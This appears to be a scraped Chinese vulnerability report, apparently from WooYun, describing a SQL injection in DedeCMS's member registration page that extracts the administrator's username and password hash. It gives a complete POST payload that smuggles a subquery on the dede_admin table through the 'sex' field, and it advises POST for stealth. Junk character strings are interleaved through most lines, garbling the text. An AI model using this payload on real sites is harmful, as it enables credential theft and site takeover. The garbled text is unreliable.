漏洞类型: SQL注射漏洞
" M: k" D1 D1 w1 T: [3 z简要描述:9 x1 N F2 H3 o m7 f. F8 I2 E
8 h' v" q) f- Y需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞., m4 g4 K# T! K
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ U1 p' }2 W6 Y8 Y# i/ S# W
详细说明:跟这个漏洞
6 y- Z9 }, V" V2 O / \: @1 W. Z6 ?
WooYun: Dedecms SQL注射导致审核机制绕过漏洞6 P; p( `2 P0 l' Q; j
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
W+ {" `* T7 {# C8 R' k" ]POST提交以下数据,其实不用POST提交的,这样隐蔽点.7 r& M1 h" N0 d. l9 j
4 G) b9 q3 V6 `+ V' H% d6 pwww.political-security.com/member/reg_new.php) {1 O w, L7 `* l
& _* D. r# c5 k
POST2 s* u( Q2 W* U/ y+ W# J7 {
9 ~9 E! K% w0 x; k8 X p& l" `
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&2 k9 H, y6 t Z, ^6 }
userid=c4rp3nt3r&uname=c4rp3nt3r
" U) l* w0 o- w* K$ H5 P&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 u/ B1 E/ j+ M1 A' A$ _
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
% d K. ^; g! P(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');& n7 ~" F3 k8 S. S" N
%00&vdcode=glos&agree= |